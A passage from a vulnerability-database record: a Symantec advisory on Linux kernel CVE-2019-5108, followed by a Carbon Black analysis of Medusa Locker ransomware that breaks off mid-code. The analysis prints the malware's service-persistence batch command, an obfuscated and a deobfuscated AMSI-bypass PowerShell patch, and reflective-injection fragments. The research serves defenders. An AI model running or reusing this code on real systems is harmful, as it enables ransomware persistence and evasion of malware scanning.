\n * Linux kernel 2.6.17.4 \n * Linux kernel 2.6.17.5 \n * Linux kernel 2.6.17.6 \n * Linux kernel 2.6.17.7 \n * Linux kernel 2.6.17.9 \n * Linux kernel 2.6.18 .1 \n * Linux kernel 2.6.18 \n * Linux kernel 2.6.18.1 \n * Linux kernel 2.6.18.2 \n * Linux kernel 2.6.18.3 \n * Linux kernel 2.6.18.4 \n * Linux kernel 2.6.18.5 \n * Linux kernel 2.6.18.6 \n * Linux kernel 2.6.18.7 \n * Linux kernel 2.6.18.8 \n * Linux kernel 2.6.19 \n * Linux kernel 2.6.19.1 \n * Linux kernel 2.6.19.2 \n * Linux kernel 2.6.19.3 \n * Linux kernel 2.6.19.4 \n * Linux kernel 2.6.2 \n * Linux kernel 2.6.20 \n * Linux kernel 2.6.20-2 \n * Linux kernel 2.6.20.1 \n * Linux kernel 2.6.20.10 \n * Linux kernel 2.6.20.11 \n * Linux kernel 2.6.20.12 \n * Linux kernel 2.6.20.13 \n * Linux kernel 2.6.20.14 \n * Linux kernel 2.6.20.15 \n * Linux kernel 2.6.20.2 \n * Linux kernel 2.6.20.3 \n * Linux kernel 2.6.20.4 \n * Linux kernel 2.6.20.5 \n * Linux kernel 2.6.20.6 \n * Linux kernel 2.6.20.7 \n * Linux kernel 2.6.20.8 \n * Linux kernel 2.6.20.9 \n * Linux kernel 2.6.21 .1 \n * Linux kernel 2.6.21 4 \n * Linux kernel 2.6.21 \n * Linux kernel 2.6.21.2 \n * Linux kernel 2.6.21.3 \n * Linux kernel 2.6.21.6 \n * Linux kernel 2.6.21.7 \n * Linux kernel 2.6.22 \n * Linux kernel 2.6.22.1 \n * Linux kernel 2.6.22.11 \n * Linux kernel 2.6.22.12 \n * Linux kernel 2.6.22.13 \n * Linux kernel 2.6.22.14 \n * Linux kernel 2.6.22.15 \n * Linux kernel 2.6.22.16 \n * Linux kernel 2.6.22.17 \n * Linux kernel 2.6.22.2 \n * Linux kernel 2.6.22.3 \n * Linux kernel 2.6.22.4 \n * Linux kernel 2.6.22.5 \n * Linux kernel 2.6.22.6 \n * Linux kernel 2.6.22.7 \n * Linux kernel 2.6.22.8 \n * Linux kernel 2.6.23 \n * Linux kernel 2.6.23.09 \n * Linux kernel 2.6.23.1 \n * Linux kernel 2.6.23.10 \n * Linux kernel 2.6.23.14 \n * Linux kernel 2.6.23.2 \n * Linux kernel 2.6.23.3 \n * Linux kernel 2.6.23.4 \n * Linux kernel 2.6.23.5 \n * Linux kernel 2.6.23.6 \n * Linux kernel 2.6.23.7 \n * Linux kernel 2.6.24 \n * Linux kernel 2.6.24.1 \n * Linux kernel 2.6.24.2 \n * Linux kernel 2.6.24.3 \n * Linux kernel 2.6.24.4 \n * Linux kernel 2.6.24.6 \n * Linux kernel 2.6.25 .15 \n * Linux kernel 2.6.25 19 \n * Linux kernel 2.6.25 \n * Linux kernel 2.6.25.1 \n * Linux kernel 2.6.25.10 \n * Linux kernel 2.6.25.11 \n * Linux kernel 2.6.25.12 \n * Linux kernel 2.6.25.13 \n * Linux kernel 2.6.25.2 \n * Linux kernel 2.6.25.3 \n * Linux kernel 2.6.25.4 \n * Linux kernel 2.6.25.5 \n * Linux kernel 2.6.25.6 \n * Linux kernel 2.6.25.7 \n * Linux kernel 2.6.25.8 \n * Linux kernel 2.6.25.9 \n * Linux kernel 2.6.26 7 \n * Linux kernel 2.6.26 \n * Linux kernel 2.6.26.1 \n * Linux kernel 2.6.26.3 \n * Linux kernel 2.6.26.4 \n * Linux kernel 2.6.26.5 \n * Linux kernel 2.6.26.6 \n * Linux kernel 2.6.27 12 \n * Linux kernel 2.6.27 3 \n * Linux kernel 2.6.27 6 \n * Linux kernel 2.6.27 \n * Linux kernel 2.6.27.12 \n * Linux kernel 2.6.27.13 \n * Linux kernel 2.6.27.14 \n * Linux kernel 2.6.27.24 \n * Linux kernel 2.6.27.26 \n * Linux kernel 2.6.27.46 \n * Linux kernel 2.6.27.49 \n * Linux kernel 2.6.27.51 \n * Linux kernel 2.6.27.54 \n * Linux kernel 2.6.27.8 \n * Linux kernel 2.6.28 \n * Linux kernel 2.6.28.1 \n * Linux kernel 2.6.28.10 \n * Linux kernel 2.6.28.2 \n * Linux kernel 2.6.28.3 \n * Linux kernel 2.6.28.4 \n * Linux kernel 2.6.28.5 \n * Linux kernel 2.6.28.6 \n * Linux kernel 2.6.28.8 \n * Linux kernel 2.6.28.9 \n * Linux kernel 2.6.29 \n * Linux kernel 2.6.29.1 \n * Linux kernel 2.6.29.4 \n * Linux kernel 2.6.3 \n * Linux kernel 2.6.30 \n * Linux kernel 2.6.30.1 \n * Linux kernel 2.6.30.10 \n * Linux kernel 2.6.30.3 \n * Linux kernel 2.6.30.4 \n * Linux kernel 2.6.30.5 \n * Linux kernel 2.6.31 \n * Linux kernel 2.6.31.1 \n * Linux kernel 2.6.31.11 \n * Linux kernel 2.6.31.13 \n * Linux kernel 2.6.31.2 \n * Linux kernel 2.6.31.4 \n * Linux kernel 2.6.31.5 \n * Linux kernel 2.6.31.6 \n * Linux kernel 2.6.32 \n * Linux kernel 2.6.32.1 \n * Linux kernel 2.6.32.10 \n * Linux kernel 2.6.32.11 \n * Linux kernel 2.6.32.12 \n * Linux kernel 2.6.32.13 \n * Linux kernel 2.6.32.14 \n * Linux kernel 2.6.32.15 \n * Linux kernel 2.6.32.16 \n * Linux kernel 2.6.32.17 \n * Linux kernel 2.6.32.18 \n * Linux kernel 2.6.32.2 \n * Linux kernel 2.6.32.22 \n * Linux kernel 2.6.32.28 \n * Linux kernel 2.6.32.3 \n * Linux kernel 2.6.32.4 \n * Linux kernel 2.6.32.5 \n * Linux kernel 2.6.32.6 \n * Linux kernel 2.6.32.60 \n * Linux kernel 2.6.32.61 \n * Linux kernel 2.6.32.62 \n * Linux kernel 2.6.32.7 \n * Linux kernel 2.6.32.8 \n * Linux kernel 2.6.32.9 \n * Linux kernel 2.6.33 \n * Linux kernel 2.6.33.1 \n * Linux kernel 2.6.33.7 \n * Linux kernel 2.6.34 \n * Linux kernel 2.6.34.1 \n * Linux kernel 2.6.34.13 \n * Linux kernel 2.6.34.14 \n * Linux kernel 2.6.34.2 \n * Linux kernel 2.6.34.3 \n * Linux kernel 2.6.35 \n * Linux kernel 2.6.35.1 \n * Linux kernel 2.6.35.13 \n * Linux kernel 2.6.35.4 \n * Linux kernel 2.6.35.5 \n * Linux kernel 2.6.36 \n * Linux kernel 2.6.37 \n * Linux kernel 2.6.37.2 \n * Linux kernel 2.6.38 \n * Linux kernel 2.6.38.2 \n * Linux kernel 2.6.38.3 \n * Linux kernel 2.6.38.4 \n * Linux kernel 2.6.38.6 \n * Linux kernel 2.6.39 \n * Linux kernel 2.6.4 \n * Linux kernel 2.6.5 \n * Linux kernel 2.6.6 \n * Linux kernel 2.6.7 \n * Linux kernel 2.6.8 \n * Linux kernel 2.6.9 \n * Linux kernel 3.0 \n * Linux kernel 3.0.1 \n * Linux kernel 3.0.18 \n * Linux kernel 3.0.2 \n * Linux kernel 3.0.34 \n * Linux kernel 3.0.37 \n * Linux kernel 3.0.4 \n * Linux kernel 3.0.5 \n * Linux kernel 3.0.58 \n * Linux kernel 3.0.59 \n * Linux kernel 3.0.60 \n * Linux kernel 3.0.62 \n * Linux kernel 3.0.65 \n * Linux kernel 3.0.66 \n * Linux kernel 3.0.69 \n * Linux kernel 3.0.72 \n * Linux kernel 3.0.75 \n * Linux kernel 3.0.98 \n * Linux kernel 3.1 \n * Linux kernel 3.1.8 \n * Linux kernel 3.10.0 \n * Linux kernel 3.10.1 \n * Linux kernel 3.10.10 \n * Linux kernel 3.10.14 \n * Linux kernel 3.10.17 \n * Linux kernel 3.10.20 \n * Linux kernel 3.10.21 \n * Linux kernel 3.10.22 \n * Linux kernel 3.10.23 \n * Linux kernel 3.10.26 \n * Linux kernel 3.10.27 \n * Linux kernel 3.10.30 \n * Linux kernel 3.10.31 \n * Linux kernel 3.10.36 \n * Linux kernel 3.10.37 \n * Linux kernel 3.10.38 \n * Linux kernel 3.10.41 \n * Linux kernel 3.10.43 \n * Linux kernel 3.10.45 \n * Linux kernel 3.10.5 \n * Linux kernel 3.10.7 \n * Linux kernel 3.10.73 \n * Linux kernel 3.10.81 \n * Linux kernel 3.10.9 \n * Linux kernel 3.10.90 \n * Linux kernel 3.11 \n * Linux kernel 3.11.3 \n * Linux kernel 3.11.6 \n * Linux kernel 3.11.9 \n * Linux kernel 3.12 \n * Linux kernel 3.12.1 \n * Linux kernel 3.12.11 \n * Linux kernel 3.12.12 \n * Linux kernel 3.12.14 \n * Linux kernel 3.12.15 \n * Linux kernel 3.12.16 \n * Linux kernel 3.12.17 \n * Linux kernel 3.12.18 \n * Linux kernel 3.12.2 \n * Linux kernel 3.12.21 \n * Linux kernel 3.12.22 \n * Linux kernel 3.12.3 \n * Linux kernel 3.12.4 \n * Linux kernel 3.12.40 \n * Linux kernel 3.12.44 \n * Linux kernel 3.12.48 \n * Linux kernel 3.12.49 \n * Linux kernel 3.12.7 \n * Linux kernel 3.13.0 \n * Linux kernel 3.13.1 \n * Linux kernel 3.13.11 \n * Linux kernel 3.13.3 \n * Linux kernel 3.13.4 \n * Linux kernel 3.13.5 \n * Linux kernel 3.13.6 \n * Linux kernel 3.13.7 \n * Linux kernel 3.13.9 \n * Linux kernel 3.14 \n * Linux kernel 3.14-1 \n * Linux kernel 3.14-4 \n * Linux kernel 3.14.2 \n * Linux kernel 3.14.3 \n * Linux kernel 3.14.37 \n * Linux kernel 3.14.4 \n * Linux kernel 3.14.45 \n * Linux kernel 3.14.5 \n * Linux kernel 3.14.54 \n * Linux kernel 3.14.7 \n * Linux kernel 3.14.73 \n * Linux kernel 3.14.79 \n * Linux kernel 3.15 \n * Linux kernel 3.15.10 \n * Linux kernel 3.15.2 \n * Linux kernel 3.15.5 \n * Linux kernel 3.15.6-200.fc20 \n * Linux kernel 3.16 \n * Linux kernel 3.16.0-28 \n * Linux kernel 3.16.1 \n * Linux kernel 3.16.2 \n * Linux kernel 3.16.36 \n * Linux kernel 3.16.58 \n * Linux kernel 3.16.6 \n * Linux kernel 3.16.7 \n * Linux kernel 3.17 \n * Linux kernel 3.17.2 \n * Linux kernel 3.17.4 \n * Linux kernel 3.17.6 \n * Linux kernel 3.18 \n * Linux kernel 3.18.1 \n * Linux kernel 3.18.11 \n * Linux kernel 3.18.137 \n * Linux kernel 3.18.140 \n * Linux kernel 3.18.17 \n * Linux kernel 3.18.2 \n * Linux kernel 3.18.22 \n * Linux kernel 3.18.3 \n * Linux kernel 3.18.7 \n * Linux kernel 3.18.8 \n * Linux kernel 3.18.9 \n * Linux kernel 3.19 \n * Linux kernel 3.19.2 \n * Linux kernel 3.19.3 \n * Linux kernel 3.2 \n * Linux kernel 3.2.1 \n * Linux kernel 3.2.102 \n * Linux kernel 3.2.12 \n * Linux kernel 3.2.13 \n * Linux kernel 3.2.2 \n * Linux kernel 3.2.23 \n * Linux kernel 3.2.24 \n * Linux kernel 3.2.38 \n * Linux kernel 3.2.42 \n * Linux kernel 3.2.44 \n * Linux kernel 3.2.50 \n * Linux kernel 3.2.51 \n * Linux kernel 3.2.52 \n * Linux kernel 3.2.53 \n * Linux kernel 3.2.54 \n * Linux kernel 3.2.55 \n * Linux kernel 3.2.56 \n * Linux kernel 3.2.57 \n * Linux kernel 3.2.60 \n * Linux kernel 3.2.62 \n * Linux kernel 3.2.63 \n * Linux kernel 3.2.63-2 \n * Linux kernel 3.2.64 \n * Linux kernel 3.2.65 \n * Linux kernel 3.2.72 \n * Linux kernel 3.2.78 \n * Linux kernel 3.2.81 \n * Linux kernel 3.2.82 \n * Linux kernel 3.2.9 \n * Linux kernel 3.3 \n * Linux kernel 3.3.2 \n * Linux kernel 3.3.4 \n * Linux kernel 3.3.5 \n * Linux kernel 3.4 \n * Linux kernel 3.4.1 \n * Linux kernel 3.4.10 \n * Linux kernel 3.4.11 \n * Linux kernel 3.4.12 \n * Linux kernel 3.4.13 \n * Linux kernel 3.4.14 \n * Linux kernel 3.4.15 \n * Linux kernel 3.4.16 \n * Linux kernel 3.4.17 \n * Linux kernel 3.4.18 \n * Linux kernel 3.4.19 \n * Linux kernel 3.4.2 \n * Linux kernel 3.4.20 \n * Linux kernel 3.4.21 \n * Linux kernel 3.4.25 \n * Linux kernel 3.4.26 \n * Linux kernel 3.4.27 \n * Linux kernel 3.4.29 \n * Linux kernel 3.4.3 \n * Linux kernel 3.4.31 \n * Linux kernel 3.4.32 \n * Linux kernel 3.4.36 \n * Linux kernel 3.4.4 \n * Linux kernel 3.4.42 \n * Linux kernel 3.4.5 \n * Linux kernel 3.4.58 \n * Linux kernel 3.4.6 \n * Linux kernel 3.4.64 \n * Linux kernel 3.4.67 \n * Linux kernel 3.4.7 \n * Linux kernel 3.4.70 \n * Linux kernel 3.4.71 \n * Linux kernel 3.4.72 \n * Linux kernel 3.4.73 \n * Linux kernel 3.4.76 \n * Linux kernel 3.4.8 \n * Linux kernel 3.4.80 \n * Linux kernel 3.4.81 \n * Linux kernel 3.4.86 \n * Linux kernel 3.4.87 \n * Linux kernel 3.4.88 \n * Linux kernel 3.4.9 \n * Linux kernel 3.4.93 \n * Linux kernel 3.5 \n * Linux kernel 3.5.1 \n * Linux kernel 3.5.2 \n * Linux kernel 3.5.3 \n * Linux kernel 3.5.4 \n * Linux kernel 3.5.5 \n * Linux kernel 3.5.6 \n * Linux kernel 3.5.7 \n * Linux kernel 3.6 \n * Linux kernel 3.6.1 \n * Linux kernel 3.6.10 \n * Linux kernel 3.6.11 \n * Linux kernel 3.6.2 \n * Linux kernel 3.6.3 \n * Linux kernel 3.6.4 \n * Linux kernel 3.6.5 \n * Linux kernel 3.6.6 \n * Linux kernel 3.6.7 \n * Linux kernel 3.6.8 \n * Linux kernel 3.6.9 \n * Linux kernel 3.7 \n * Linux kernel 3.7.1 \n * Linux kernel 3.7.10 \n * Linux kernel 3.7.2 \n * Linux kernel 3.7.3 \n * Linux kernel 3.7.4 \n * Linux kernel 3.7.5 \n * Linux kernel 3.7.6 \n * Linux kernel 3.7.7 \n * Linux kernel 3.7.8 \n * Linux kernel 3.7.9 \n * Linux kernel 3.8 \n * Linux kernel 3.8.1 \n * Linux kernel 3.8.2 \n * Linux kernel 3.8.4 \n * Linux kernel 3.8.5 \n * Linux kernel 3.8.6 \n * Linux kernel 3.8.9 \n * Linux kernel 3.9 \n * Linux kernel 3.9.4 \n * Linux kernel 3.9.8 \n * Linux kernel 4.0 \n * Linux kernel 4.0.5 \n * Linux kernel 4.0.6 \n * Linux kernel 4.1 \n * Linux kernel 4.1.1 \n * Linux kernel 4.1.15 \n * Linux kernel 4.1.4 \n * Linux kernel 4.1.47 \n * Linux kernel 4.1.51 \n * Linux kernel 4.10.0 \n * Linux kernel 4.10.1 \n * Linux kernel 4.10.10 \n * Linux kernel 4.10.11 \n * Linux kernel 4.10.12 \n * Linux kernel 4.10.13 \n * Linux kernel 4.10.15 \n * Linux kernel 4.10.2 \n * Linux kernel 4.10.3 \n * Linux kernel 4.10.4 \n * Linux kernel 4.10.5 \n * Linux kernel 4.10.6 \n * Linux kernel 4.10.7 \n * Linux kernel 4.10.8 \n * Linux kernel 4.10.9 \n * Linux kernel 4.11.0 \n * Linux kernel 4.11.1 \n * Linux kernel 4.11.2 \n * Linux kernel 4.11.3 \n * Linux kernel 4.11.4 \n * Linux kernel 4.11.5 \n * Linux kernel 4.11.7 \n * Linux kernel 4.11.8 \n * Linux kernel 4.11.9 \n * Linux kernel 4.12 \n * Linux kernel 4.12.1 \n * Linux kernel 4.12.10 \n * Linux kernel 4.12.2 \n * Linux kernel 4.12.3 \n * Linux kernel 4.12.4 \n * Linux kernel 4.12.9 \n * Linux kernel 4.13 \n * Linux kernel 4.13.1 \n * Linux kernel 4.13.10 \n * Linux kernel 4.13.11 \n * Linux kernel 4.13.14 \n * Linux kernel 4.13.2 \n * Linux kernel 4.13.3 \n * Linux kernel 4.13.4 \n * Linux kernel 4.13.5 \n * Linux kernel 4.13.6 \n * Linux kernel 4.13.7 \n * Linux kernel 4.13.8 \n * Linux kernel 4.13.9 \n * Linux kernel 4.14 \n * Linux kernel 4.14.1 \n * Linux kernel 4.14.10 \n * Linux kernel 4.14.109 \n * Linux kernel 4.14.11 \n * Linux kernel 4.14.114 \n * Linux kernel 4.14.120 \n * Linux kernel 4.14.13 \n * Linux kernel 4.14.14 \n * Linux kernel 4.14.15 \n * Linux kernel 4.14.2 \n * Linux kernel 4.14.25 \n * Linux kernel 4.14.3 \n * Linux kernel 4.14.31 \n * Linux kernel 4.14.4 \n * Linux kernel 4.14.5 \n * Linux kernel 4.14.6 \n * Linux kernel 4.14.67 \n * Linux kernel 4.14.7 \n * Linux kernel 4.14.71 \n * Linux kernel 4.14.78 \n * Linux kernel 4.14.8 \n * Linux kernel 4.14.90 \n * Linux kernel 4.15.0 \n * Linux kernel 4.15.11 \n * Linux kernel 4.15.14 \n * Linux kernel 4.15.16 \n * Linux kernel 4.15.4 \n * Linux kernel 4.15.7 \n * Linux kernel 4.15.8 \n * Linux kernel 4.15.9 \n * Linux kernel 4.16 \n * Linux kernel 4.16.11 \n * Linux kernel 4.16.3 \n * Linux kernel 4.16.4 \n * Linux kernel 4.16.6 \n * Linux kernel 4.16.7 \n * Linux kernel 4.16.9 \n * Linux kernel 4.17 \n * Linux kernel 4.17.1 \n * Linux kernel 4.17.10 \n * Linux kernel 4.17.11 \n * Linux kernel 4.17.2 \n * Linux kernel 4.17.3 \n * Linux kernel 4.17.4 \n * Linux kernel 4.17.7 \n * Linux kernel 4.18 \n * Linux kernel 4.18.1 \n * Linux kernel 4.18.11 \n * Linux kernel 4.18.12 \n * Linux kernel 4.18.16 \n * Linux kernel 4.18.5 \n * Linux kernel 4.18.6 \n * Linux kernel 4.18.7 \n * Linux kernel 4.18.9 \n * Linux kernel 4.19 \n * Linux kernel 4.19.13 \n * Linux kernel 4.19.19 \n * Linux kernel 4.19.2 \n * Linux kernel 4.19.23 \n * Linux kernel 4.19.3 \n * Linux kernel 4.19.32 \n * Linux kernel 4.19.37 \n * Linux kernel 4.19.44 \n * Linux kernel 4.19.6 \n * Linux kernel 4.19.8 \n * Linux kernel 4.19.9 \n * Linux kernel 4.2 \n * Linux kernel 4.2.3 \n * Linux kernel 4.2.8 \n * Linux kernel 4.20 \n * Linux kernel 4.20.10 \n * Linux kernel 4.20.12 \n * Linux kernel 4.20.14 \n * Linux kernel 4.20.15 \n * Linux kernel 4.20.2 \n * Linux kernel 4.20.5 \n * Linux kernel 4.20.6 \n * Linux kernel 4.20.8 \n * Linux kernel 4.3.3 \n * Linux kernel 4.4 \n * Linux kernel 4.4.0-57 \n * Linux kernel 4.4.1 \n * Linux kernel 4.4.105 \n * Linux kernel 4.4.121 \n * Linux kernel 4.4.125 \n * Linux kernel 4.4.14 \n * Linux kernel 4.4.157 \n * Linux kernel 4.4.177 \n * Linux kernel 4.4.180 \n * Linux kernel 4.4.194 \n * Linux kernel 4.4.195 \n * Linux kernel 4.4.2 \n * Linux kernel 4.4.22 \n * Linux kernel 4.4.23 \n * Linux kernel 4.4.24 \n * Linux kernel 4.4.25 \n * Linux kernel 4.4.26 \n * Linux kernel 4.4.27 \n * Linux kernel 4.4.28 \n * Linux kernel 4.4.29 \n * Linux kernel 4.4.30 \n * Linux kernel 4.4.38 \n * Linux kernel 4.4.7 \n * Linux kernel 4.5 \n * Linux kernel 4.5.5 \n * Linux kernel 4.6 \n * Linux kernel 4.6.1 \n * Linux kernel 4.6.2 \n * Linux kernel 4.6.3 \n * Linux kernel 4.7 \n * Linux kernel 4.7.4 \n * Linux kernel 4.7.9 \n * Linux kernel 4.8 \n * Linux kernel 4.8.1 \n * Linux kernel 4.8.11 \n * Linux kernel 4.8.12 \n * Linux kernel 4.8.13 \n * Linux kernel 4.8.14 \n * Linux kernel 4.8.3 \n * Linux kernel 4.8.6 \n * Linux kernel 4.8.7 \n * Linux kernel 4.9.0 \n * Linux kernel 4.9.11 \n * Linux kernel 4.9.128 \n * Linux kernel 4.9.13 \n * Linux kernel 4.9.135 \n * Linux kernel 4.9.166 \n * Linux kernel 4.9.177 \n * Linux kernel 4.9.3 \n * Linux kernel 4.9.36 \n * Linux kernel 4.9.4 \n * Linux kernel 4.9.53 \n * Linux kernel 4.9.6 \n * Linux kernel 4.9.68 \n * Linux kernel 4.9.71 \n * Linux kernel 4.9.74 \n * Linux kernel 4.9.8 \n * Linux kernel 4.9.87 \n * Linux kernel 4.9.9 \n * Linux kernel 4.9.91 \n * Linux kernel 5.0 \n * Linux kernel 5.0.1 \n * Linux kernel 5.0.10 \n * Linux kernel 5.0.11 \n * Linux kernel 5.0.14 \n * Linux kernel 5.0.15 \n * Linux kernel 5.0.17 \n * Linux kernel 5.0.2 \n * Linux kernel 5.0.21 \n * Linux kernel 5.0.3 \n * Linux kernel 5.0.4 \n * Linux kernel 5.0.5 \n * Linux kernel 5.0.6 \n * Linux kernel 5.0.7 \n * Linux kernel 5.0.8 \n * Linux kernel 5.0.9 \n * Linux kernel 5.1 \n * Linux kernel 5.1.12 \n * Linux kernel 5.1.13 \n * Linux kernel 5.1.14 \n * Linux kernel 5.1.15 \n * Linux kernel 5.1.17 \n * Linux kernel 5.1.2 \n * Linux kernel 5.1.3 \n * Linux kernel 5.1.5 \n * Linux kernel 5.1.6 \n * Linux kernel 5.1.7 \n * Linux kernel 5.1.8 \n * Linux kernel 5.1.9 \n * Linux kernel 5.2.1 \n * Linux kernel 5.2.10 \n * Linux kernel 5.2.13 \n * Linux kernel 5.2.14 \n * Linux kernel 5.2.17 \n * Linux kernel 5.2.2 \n * Linux kernel 5.2.3 \n * Linux kernel 5.2.6 \n * Linux kernel 5.2.8 \n * Linux kernel 5.2.9 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nAllow only trusted individuals to have user accounts and local access to the resources. \n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights. \n\nCurrently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.\n", "modified": "2020-12-11T00:00:00", "published": "2020-12-11T00:00:00", "id": "SMNTC-111398", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111398", "title": "Linux Kernel CVE-2019-5108 Denial of Service Vulnerability", "type": "symantec", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}], "carbonblack": [{"lastseen": "2020-06-03T17:50:20", "bulletinFamily": "blog", "description": "In recent weeks Carbon Black\u2019s Threat Analysis Unit (TAU) has seen an increase in the number of infections attributed to the Medusa Locker ransomware family. There were notable traits exhibited by Medusa Locker in these attacks that warranted further investigation to determine behavioral tactics that could be used by future malware families. \n\nMedusa Locker used multiple stages of infection, starting with an initial batch file and text document, used to inject ransomware into memory for execution. Notably, it uses known PowerShell code to perform reflective injection of its code, causing PowerShell itself to perform the malicious activity. \n\nThis ransomware was involved in altering the system to permanently remove volume shadow copies and delete system services before encrypting data using standard AES-256 encryption.\n\nThis post focuses on the unique aspects of the malware, post-delivery, and their impact on the victimized environment.\n\n# Component: Malware loader script\n\nThe initial attack started with the execution of a batch file that executed PowerShell for further activity. This file is a batch script that is responsible for running multiple commands, shown below: \n \n \n sc create purebackup binpath= \"C:\\Windows\\system32\\cmd.exe \n \n \n /C start /b C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe -c $km = \n \n \n [IO.File]::ReadAllText('C:\\Windows\\SysWOW64\\qzx.txt'); IEX $km\" start= auto DisplayName= \"purebackup\" \n \n--- \n \nFigure 1: Malicious batch file contents\n\nThis file has very simple operations. It will look for a pre-established ASCII text file in the folder of **C:\\Windows\\SysWOW64\\**. It will then read in the entire contents of that file, described below in Stage 2, and execute it. This file is entrenched into the system as a Windows service named \u201cpurebackup\u201d, to ensure that the action is performed upon startup. The final character, \u201c\u6100\u201d, appears to be a Chinese hanji character, but it has no importance in the execution of the attack.\n\n# Component: Malicious code document\n\nA text document is stored on the hard drive that contains the contents of known PowerShell code used for process injection using the publicly available PowerSploit script \u201cInvoke-ReflectivePEInjection\u201d. The earlier malicious batch file is responsible for reading in the entirety of text in this document and executing it, thus starting the ransomware process. Notably in this code is a reflective process injection that performs unique activity of injecting into the parent of the running process. Here, that is PowerShell.exe. \n\nThere were slight changes made to that file. Below are segments of code where there are differences from the malware, bolded, and the original code:\n \n \n if ([Environment]::OSVersion.Version -ge (new-object ((\"{0}{1}{2}\" -f'Vers','i','on')) 10,0)) {\n ${w`in`32} = @\"\n using System;.exe\n using System.Runtime.InteropServices;\n public class Win32 {\n \u00a0\u00a0\u00a0\u00a0[DllImport(\"kernel32\")]\n \u00a0\u00a0\u00a0\u00a0public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n \u00a0\u00a0\u00a0\u00a0[DllImport(\"kernel32\")]\n \u00a0\u00a0\u00a0\u00a0public static extern IntPtr LoadLibrary(string name);\n \u00a0\u00a0\u00a0\u00a0[DllImport(\"kernel32\")]\n \u00a0\u00a0\u00a0\u00a0public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);\n }\n \"@\n \n Add-Type ${wI`N`32}\n \n ${Loa`D`L`iBRary} = [Win32]::LoadLibrary(\"am\" + (\"{1}{0}{2}\" -f'dl','si.','l'))\n ${a`DdrE`ss} = [Win32]::GetProcAddress(${l`oa`dLIbrA`Ry}, (\"{1}{0}\" -f 'msi','A') + (\"{1}{0}\" -f 'an','Sc') + (\"{0}{1}\"-f'Buffe','r'))\n ${p} = 0\n [Win32]::VirtualProtect(${aDD`ResS}, [uint32]5, 0x40, [ref]${p})\n \n \n [Byte] $c1 = 0xB8\n [Byte] $c3 = 0x00\n [Byte] $c2 = 0x80\n [Byte] $c4 = 0x57\n [Byte] $c5 = 0x07\n [Byte] $c6 = 0xC3\n \n ${P`At`Ch} = [Byte[]] ($c1, $c4, $c3, $c5, $c2, $c6)\n [System.Runtime.InteropServices.Marshal]::Copy(${p`A`TCH}, 0, ${Addr`e`sS}, 6)\n \n }\n \n \n \n \n function Invoke-SQLServ\n {\n <#\n .SYNOPSIS\n \n This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,\u00a0\n or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,\u00a0\n \n < truncated for brevity >\n \u00a0\u00a0\u00a0\u00a0if (${c`o`MPuter`NAme} -eq ${Nu`Ll} -or ${cOmp`UTErnA`mE} -imatch \"^\\s*$\")\n \u00a0\u00a0\u00a0\u00a0{\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Invoke-Command -ScriptBlock ${rEMOT`esCr`ip`T`B`loCk} -ArgumentList @(${peB`YT`Es}, ${f`U`NCrETUR`N`TyPE}, ${prO`cId}, ${pR`OCn`AMe},${For`C`eaSLR})\n \u00a0\u00a0\u00a0\u00a0}\n \u00a0\u00a0\u00a0\u00a0else\n \u00a0\u00a0\u00a0\u00a0{\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Invoke-Command -ScriptBlock ${REm`otEsC`RI`Pt`BlOcK} -ArgumentList @(${PeBY`TES}, ${FU`NcRe`TuRN`TYPe}, ${P`ROc`Id}, ${PrO`cn`AmE},${f`O`RCE`ASlr}) -ComputerName ${co`mpU`TER`NaME}\n \u00a0\u00a0\u00a0\u00a0}\n }\n \n Main\n }\n \n \n \n ${inPUTST`R`iNG} = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAHMY\n < truncated for brevity >\n \n \n--- \n \nFigure 2: Abbreviated contents of stored PowerShell code\n\nNotably, there were obfuscated additions and modifications of code used to ensure the malware is executed, shown below:\n \n \n Add-Type ${wI`N`32}\n \n ${Loa`D`L`iBRary} = [Win32]::LoadLibrary(\"am\" + (\"{1}{0}{2}\" -f'dl','si.','l'))\n ${a`DdrE`ss} = [Win32]::GetProcAddress(${l`oa`dLIbrA`Ry}, (\"{1}{0}\" -f 'msi','A') + (\"{1}{0}\" -f 'an','Sc') + (\"{0}{1}\"-f'Buffe','r'))\n ${p} = 0\n [Win32]::VirtualProtect(${aDD`ResS}, [uint32]5, 0x40, [ref]${p})\n \n \n [Byte] $c1 = 0xB8\n [Byte] $c3 = 0x00\n [Byte] $c2 = 0x80\n [Byte] $c4 = 0x57\n [Byte] $c5 = 0x07\n [Byte] $c6 = 0xC3\n \n ${P`At`Ch} = [Byte[]] ($c1, $c4, $c3, $c5, $c2, $c6)\n [System.Runtime.InteropServices.Marshal]::Copy(${p`A`TCH}, 0, ${Addr`e`sS}, 6)\n \n \n \n--- \n \nFigure 3: Original PowerShell code for AMSI bypass\n\nThere are various forms of obfuscation here, especially in the combination of rearranged strings. When cleaned up to make more readable, this code appears as:\n \n \n Add-Type ${wIN32}\n \n ${LoadLibrary} = [Win32]::LoadLibrary(\"amsi.dll\u201d)\n ${AmsiScanBuffer_Ptr} = [Win32]::GetProcAddress(${LoadLibrary}, (\"AmsiScanBuffer\u201d)\n ${p} = 0\n ${dwSize} = 5\n [Win32]::VirtualProtect(${AmsiScanBuffer_Ptr}, ${dwSize}, PAGE_EXECUTE_READWRITE, ${p})\n \n ${PAtCh} = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 